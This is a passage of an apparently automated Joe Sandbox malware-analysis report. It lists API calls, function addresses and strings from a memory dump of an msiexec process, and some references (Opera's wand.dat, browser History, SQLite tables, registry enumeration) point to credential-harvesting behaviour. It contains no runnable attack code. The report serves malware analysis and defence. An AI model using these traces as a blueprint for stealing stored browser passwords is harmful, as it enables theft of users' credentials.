                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFilefreememset
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                      • malloc.MSVCRT ref: 00417524
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                      • free.MSVCRT ref: 00417544
                                                                                                      • free.MSVCRT ref: 00417562
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                      • free.MSVCRT ref: 0041822B
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: PathTemp$free
                                                                                                      • String ID: %s\etilqs_$etilqs_
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040FDD5
                                                                                                        • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                      • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                                      • String ID: Error$Error %d: %s
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: foreign key constraint failed$new$oid$old
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                        • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                      • memset.MSVCRT ref: 0040C439
                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                      • _wcsupr.MSVCRT ref: 0040C481
                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                      • memset.MSVCRT ref: 0040C4D0
                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                      Similarity
                                                                                                      • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0044A6EB
                                                                                                      • memset.MSVCRT ref: 0044A6FB
                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: gj
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                      • free.MSVCRT ref: 0040E9D3
                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                      Similarity
                                                                                                      • API ID: ??3@$free
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                      • malloc.MSVCRT ref: 004174BD
                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                      • free.MSVCRT ref: 004174E4
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • GetParent.USER32(?), ref: 0040D453
                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                      • memset.MSVCRT ref: 004450CD
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • wcscpy.MSVCRT ref: 0044475F
                                                                                                      • wcscat.MSVCRT ref: 0044476E
                                                                                                      • wcscat.MSVCRT ref: 0044477F
                                                                                                      • wcscat.MSVCRT ref: 0044478E
                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                      • String ID: \StringFileInfo\
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _memicmpwcslen
                                                                                                      • String ID: @@@@$History
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004100FB
                                                                                                      • memset.MSVCRT ref: 00410112
                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                      • _snwprintf.MSVCRT ref: 00410141
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                      • String ID: </%s>
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040D58D
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                      • String ID: caption
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                      • String ID: MS Sans Serif
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassName_wcsicmpmemset
                                                                                                      • String ID: edit
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memcmp
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: memset$memcpy
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                      • GetMenu.USER32(?), ref: 00410F8D
                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                      Similarity
                                                                                                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                      • GetLastError.KERNEL32 ref: 0041810A
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                      Similarity
                                                                                                      • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                      Strings
                                                                                                      • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                      • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                      • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040560C
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                      Similarity
                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                      • String ID: *.*$dat$wand.dat
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                      • wcslen.MSVCRT ref: 00410C74
                                                                                                      • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00412057
                                                                                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                      Similarity
                                                                                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • free.MSVCRT ref: 0040F561
                                                                                                      • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$free
                                                                                                      • String ID: g4@
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                      • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: @
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                      • memset.MSVCRT ref: 0040AF18
                                                                                                      • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004144E7
                                                                                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                        • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                      • memset.MSVCRT ref: 0041451A
                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                      • memset.MSVCRT ref: 0042FED3
                                                                                                      • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: sqlite_master
                                                                                                      • API String ID: 438689982-3163232059
                                                                                                      APIs
                                                                                                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                      • wcscpy.MSVCRT ref: 00414DF3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3917621476-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                      • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                      • _snwprintf.MSVCRT ref: 0041100C
                                                                                                      • wcscat.MSVCRT ref: 0041101F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 822687973-0
                                                                                                      APIs
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76F8DF80,?,0041755F,?), ref: 00417452
                                                                                                      • malloc.MSVCRT ref: 00417459
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,76F8DF80,?,0041755F,?), ref: 00417478
                                                                                                      • free.MSVCRT ref: 0041747F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 2605342592-0
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                      • RegisterClassW.USER32(?), ref: 00412428
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2678498856-0
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Item
                                                                                                      • String ID:
                                                                                                      • API String ID: 3888421826-0
